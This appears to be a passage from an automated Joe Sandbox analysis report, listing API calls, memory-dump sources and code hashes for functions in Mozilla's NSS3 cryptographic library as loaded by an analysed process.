                                                                                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CF91DE0,?), ref: 6CEC6CFE
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEC6D26
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CEC6D70
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000480), ref: 6CEC6D82
                                                                                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6CEC6DA2
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEC6DD8
                                                                                                                                                                                                                                                                                                                      • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CEC6E60
                                                                                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CEC6F19
                                                                                                                                                                                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6CEC6F2D
                                                                                                                                                                                                                                                                                                                      • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CEC6F7B
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CEC7011
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CEC7033
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEC703F
                                                                                                                                                                                                                                                                                                                      • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CEC7060
                                                                                                                                                                                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CEC7087
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CEC70AF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: fc3e15e8bf377f937d5902d734014947511ace464a39e53780099029e2b2db2e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 79b346b2ff4dd00bf212daebcf483338c1bb4c87fe9fa20b0fec65c7595b294b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc3e15e8bf377f937d5902d734014947511ace464a39e53780099029e2b2db2e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34A1F471B142409BEB009E24DE42BBB36B8DB8130CF34493AE979CBB91E735D9458753
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8AF25
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8AF39
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8AF51
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8AF69
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE8B06B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE8B083
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE8B0A4
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE8B0C1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6CE8B0D9
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE8B102
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE8B151
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE8B182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFAB0: free.MOZGLUE(?,-00000001,?,?,6CE5F673,00000000,00000000), ref: 6CEBFAC7
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CE8B177
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8B1A2
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8B1AA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CE6AB95,00000000,?,00000000,00000000,00000000), ref: 6CE8B1C2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB1560: TlsGetValue.KERNEL32(00000000,?,6CE80844,?), ref: 6CEB157A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB1560: EnterCriticalSection.KERNEL32(?,?,?,6CE80844,?), ref: 6CEB158F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB1560: PR_Unlock.NSS3(?,?,?,?,6CE80844,?), ref: 6CEB15B2
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4188828017-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 975e43a2be1eacb5c907efcc48b921c8aecfef814cc51c9b214e316f6f0ef6ff
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e058b41f3bb29557f11376fbe8064f8f679b3a9cc65790c21a1c04f920b4bdf4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 975e43a2be1eacb5c907efcc48b921c8aecfef814cc51c9b214e316f6f0ef6ff
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92A170B6E012059BEF019F64DC81BAAB7B4FF0530CF244129E909AB751E731E959CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(#?l,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23,?), ref: 6CE82C62
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23,?), ref: 6CE82C76
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23,?), ref: 6CE82C86
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23,?), ref: 6CE82C93
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23,?), ref: 6CE82CC6
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23,?), ref: 6CE82CDA
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CE7E477,?,?,?,00000001,00000000,?,?,6CE83F23), ref: 6CE82CEA
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CE7E477,?,?,?,00000001,00000000,?), ref: 6CE82CF7
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CE7E477,?,?,?,00000001,00000000,?), ref: 6CE82D4D
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE82D61
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6CE82D71
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE82D7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                                                      • String ID: #?l
                                                                                                                                                                                                                                                                                                                      • API String ID: 2446853827-1190849705
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 49b98963eb39360929a69c413069faaa78e6dafb7b7d3bd25a387f9e02796415
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 342ff8b17004b14a54cebf76927551e6be9191317b192de3d774208a078e77a9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b98963eb39360929a69c413069faaa78e6dafb7b7d3bd25a387f9e02796415
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51E5B6D01205ABDB01AF24DC859AABB78FF2535CB248524EC1C97B12F731E964C7E1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEDADB1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE30: SECOID_FindOID_Util.NSS3(6CE7311B,00000000,?,6CE7311B,?), ref: 6CEBBE44
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CEDADF4
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CEDAE08
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEDAE25
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6CEDAE63
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CEDAE4D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: TlsGetValue.KERNEL32(?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4C97
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CB0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CC9
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEDAE93
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CEDAECC
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6CEDAEDE
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6CEDAEE6
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEDAEF5
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6CEDAF16
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6b4260688578b36291d9d12e524ecb5630f61f2b1e6a85d21db7fe7e5ede63ef
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 51cffa7dc98531aeaff9ea90eb648156dd1bae2f4220dc1b7b0498ce7757e105
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b4260688578b36291d9d12e524ecb5630f61f2b1e6a85d21db7fe7e5ede63ef
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B341F7B198420167E7215A24DC45BBB32B8AF4230CF350529EC1496B41EB35BB8AC7E3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29890: TlsGetValue.KERNEL32(?,?,?,6CF297EB), ref: 6CF2989E
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF7AF88
                                                                                                                                                                                                                                                                                                                      • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CF7AFCE
                                                                                                                                                                                                                                                                                                                      • PR_SetPollableEvent.NSS3(?), ref: 6CF7AFD9
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF7AFEF
                                                                                                                                                                                                                                                                                                                      • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6CF7B00F
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF7B02F
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF7B070
                                                                                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6CF7B07B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF7B084
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF7B09B
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF7B0C4
                                                                                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6CF7B0F3
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF7B0FC
                                                                                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6CF7B137
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF7B140
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 235599594-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7496e159b39c59be8a523ef9a3aaaf4185f48891f23b5ddd485ce367743f753c
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3f8624ad25499f94edb886e6732d798a9e4ac1fc44a0c5e53de802b28743b986
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7496e159b39c59be8a523ef9a3aaaf4185f48891f23b5ddd485ce367743f753c
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 579171B5900601DFCB14DF14D88498ABBF1FF49318729856AD8199BB21EB32FD45CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CEF2A28,00000060,00000001), ref: 6CEF2BF0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CEF2A28,00000060,00000001), ref: 6CEF2C07
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CEF2A28,00000060,00000001), ref: 6CEF2C1E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF2BE0: free.MOZGLUE(?,00000000,00000000,?,6CEF2A28,00000060,00000001), ref: 6CEF2C4A
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5D0F
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5D4E
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5D62
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5D85
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5D99
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5DFA
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5E33
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CEF5E3E
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CEF5E47
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5E60
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CEFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CEF5E78
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6CEFAAD4), ref: 6CEF5EB9
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6CEFAAD4), ref: 6CEF5EF0
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CEFAAD4), ref: 6CEF5F3D
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CEFAAD4), ref: 6CEF5F4B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4273776295-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 566cf3d67479528789502f341cdf1ce03a4e3d9158204f3941b62d6a0623d584
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 734e951ff2f4cff35119f32e2fd07bbf39da16e381582bae6163cab02b9ae864
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 566cf3d67479528789502f341cdf1ce03a4e3d9158204f3941b62d6a0623d584
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB719CB4A01B019FD710CF24D884A93B7F5BF99308F248529E86E97B11EB32F955CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?), ref: 6CE78E22
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE78E36
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6CE78E4F
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,?,?,?), ref: 6CE78E78
